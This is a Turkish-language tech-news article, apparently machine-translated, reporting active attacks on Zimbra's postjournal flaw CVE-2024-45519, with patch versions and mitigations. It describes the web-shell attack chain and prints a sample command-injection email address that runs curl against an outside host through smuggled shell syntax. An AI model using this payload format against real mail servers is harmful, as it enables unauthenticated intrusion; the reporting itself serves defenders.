Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Yazı Tipi BoyutlandırıcıAa
  • Anasayfa
  • Teknoloji
    • Siber Güvenlik
    • Yapay Zeka
    • Donanım
    • Bilim
  • Yazılım
  • Savunma & İstihbarat
  • Oyun
  • Yaşam
    • Finans
    • Sinema
    • Dünyadan Haberler
  • İş Birliği
Okuma: Araştırmacılar, Zimbra’nın Günlük Sonrası Kritik Kusurundan Yararlanan Aktif Saldırılara Karşı Alarm Veriyor
Paylaş
Yazı Tipi BoyutlandırıcıAa
Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Ara
Bizi Takip Et
  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti
© 2026 Teknomers. All Rights Reserved.

Anasayfa » Araştırmacılar, Zimbra’nın Günlük Sonrası Kritik Kusurundan Yararlanan Aktif Saldırılara Karşı Alarm Veriyor

GenelSiber Güvenlik

Araştırmacılar, Zimbra’nın Günlük Sonrası Kritik Kusurundan Yararlanan Aktif Saldırılara Karşı Alarm Veriyor

teknomers
Son güncelleme: 2 Ekim 2024 11:31
teknomers
Paylaş
Paylaş


02 Eki 2024Hacker HaberleriE-posta Güvenliği / Güvenlik Açığı

Siber güvenlik araştırmacıları, Synacor’un Zimbra İşbirliğinde yeni ortaya çıkan bir güvenlik açığını hedef alan aktif istismar girişimleri konusunda uyarıda bulunuyor.

Kurumsal güvenlik firması Proofpoint, etkinliği 28 Eylül 2024’ten itibaren gözlemlemeye başladığını söyledi. CVE-2024-45519Zimbra’nın günlük sonrası hizmetinde, kimliği doğrulanmamış saldırganların etkilenen kurulumlarda rastgele komutlar yürütmesine olanak tanıyan ciddi bir güvenlik açığı.

Proofpoint, “Gmail’i taklit eden e-postalar, Zimbra sunucularının bunları ayrıştırıp komut olarak yürütmesi amacıyla CC alanlarındaki sahte adreslere gönderildi.” söz konusu X’teki bir dizi gönderide. “Adresler, sh yardımcı programıyla yürütülen Base64 dizelerini içeriyordu.”

Kritik sorun Zimbra tarafından ele alındı. 8.8.15 Yama 46, 9.0.0 Yama 41, 10.0.9 ve 10.1.1 sürümleri 4 Eylül 2024’te yayınlandı. Lebr0nli (Alan Li) adlı bir güvenlik araştırmacısının, eksikliği keşfetmesi ve raporlamasıyla itibar kazandı.

Synacor’da güvenlik mimarı mühendisi olan Ashish Kataria, “Günlük sonrası özelliği çoğu sistemde isteğe bağlı olsa da veya etkinleştirilmese de, olası istismarı önlemek için sağlanan yamayı uygulamak hala gereklidir.” not edildi 19 Eylül 2024 tarihli bir yorumda.

“Günlük sonrası özelliğinin etkinleştirilmediği ve yamanın hemen uygulanamadığı Zimbra sistemleri için, günlük sonrası ikili dosyasının kaldırılması, yama uygulanana kadar geçici bir önlem olarak düşünülebilir.”

Zimbra Günlük Sonrası Kusur

Proofpoint, kodu çözüldüğünde savunmasız bir Zimbra sunucusuna şu konumdaki bir web kabuğu yazmaya çalışan bir dizi CC’d adresi tanımladığını söyledi: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp.”

Yüklenen web kabuğu daha sonra önceden belirlenmiş bir JSESSIONID Çerez alanıyla gelen bağlantıyı dinler ve varsa, Base64 komutları için JACTION çerezini ayrıştırmaya devam eder.

Web kabuğu, exec aracılığıyla komut yürütme desteğiyle donatılmıştır. Alternatif olarak, bir dosyayı soket bağlantısı üzerinden indirip çalıştırabilir. Bu yazının yazıldığı tarih itibarıyla saldırılar bilinen bir tehdit aktörüne veya grubuna atfedilmemiştir.

Bununla birlikte, yararlanma faaliyeti, Project Discovery’nin kusurun teknik ayrıntılarını yayınlamasından bir gün sonra başlamış gibi görünüyor. söz konusu bu “temizlenmemiş kullanıcı girişinin aktarılmasından kaynaklanıyor açık yamasız sürümde saldırganların keyfi komutlar vermesine olanak tanıyor.”

Siber güvenlik şirketi, sorunun kökeninin, C tabanlı günlük sonrası ikili programın alıcı e-posta adreslerini “msg_handler()” adı verilen bir işlevde işlemesi ve ayrıştırması, böylece özel hazırlanmış bir SMTP’yi geçirirken 10027 numaralı bağlantı noktasında çalışan hizmete komut enjeksiyonuna izin verme şeklinden kaynaklandığını söyledi. sahte adres içeren mesaj (örneğin, “aabbb$(curl${IFS}oast.me)”@mail.domain.com).

Aktif istismar girişimleri ışığında, potansiyel tehditlere karşı optimum koruma sağlamak için kullanıcıların en son yamaları uygulamaları şiddetle tavsiye edilir.



siber-2

Elon Musk’a göre başarının anahtarı
Bir Ejderha Gibi: Ishin İnceleme
Ayrıcalıklı: Yürüyüşünüze uyum sağlayan ayakkabılar hayal edin; yeni bir yapay zeka atılımı, gündelik nesnelerin gerçek zamanlı olarak öğrenmesine olanak tanıyacak
Call of Duty: Black Ops 6, Denetleme ve Toksisite için Davranış Raporları Aldı
Şu ana kadar sahip olduğum en sevdiğim Ninja cihazım Black Friday indirimleri sayesinde 130$ indirimde
ETİKETLENDİ:ağ güvenliğiAktifAlarmAraştırmacılarbilgi Güvenliğibilgisayar Güvenliğifidye yazılımı kötü amaçlı yazılımgünlükhack haberlerihacker haberleriKarşıKritikkusurundannasıl hacklenirsaldırılarasiber güncellemelersiber güvenlik güncellemelerisiber güvenlik haberleriSiber güvenlik haberleri bugünSiber Haberlersiber saldırılarsonrasıveri ihlaliVeriyoryararlananyazılım güvenlik açığıZimbranın
Bu Makaleyi Paylaş
Facebook Bağlantıyı Kopyala Yazdır
Paylaş
Önceki Makale Bu Garmin Vivoactive 5 fırsatı hala Amazon’da mevcut
Sonraki Makale ‘Guguk Kuşu’ Ekrana Sarsıcı Bir Uçuş Yaptı

Sanal Medya

FacebookBeğen
452Takip Et
PinterestSabitle
237Takip Et

Son Eklenenler

Google AI Abonelik Fiyat Savaşlarında Uyarı Verdi
Genel
Destiny 2 Oyuncu Sayısında Rekor Artış, Son Güncelleme Heyecanı
Oyun
Acil: Windows 11 için KB5094126 ve KB5093998 Güncellemeleri Yayınlandı
Siber Güvenlik
Siri AI’yi Denedim, İşe Yarıyor Mu?
Liste
Justin Ernest geleneksel bir VC fonu olmadan sıcak girişimlere 400 milyon dolara yakın yatırım yaptı
Genel
SwitchBot’un E Ink Hava İstasyonu Şimdi %20 İndirimde
Liste
//

Siber güvenlik, yapay zeka ve savunma sanayiinden; finans ve sinema dünyasına uzanan geniş bir yelpaze. Teknomers; teknoloji, strateji ve yazılım dünyasını sade bir dille sizlerle buluşturuyor.

Kurumsal

  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti

Kategoriler

  • Teknoloji
  • Oyun
  • Sinema
  • Siber Güvenlik
  • Bilim
  • Finans
  • Dünyadan Güncel Haberler

Populer

  • TV'de Ücretsiz İzlenebilen Şifresiz Erotik Kanallar (2025 Güncel Frekans Listesi)

  • The Last of Us PC Kontrolleri: Hızlı Silah Değiştirme ve Tüm Tuşlar (2025)

  • Hogwarts Legacy'de Odaklanma İksiri Nasıl Yapılır?

Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Bizi Takip Et
© 2026 Teknomers. All Rights Reserved.
Welcome Back!

Sign in to your account

Kullanıcı Adı veya E-posta Adresi
Şifre

Şifrenizi mi unuttunuz?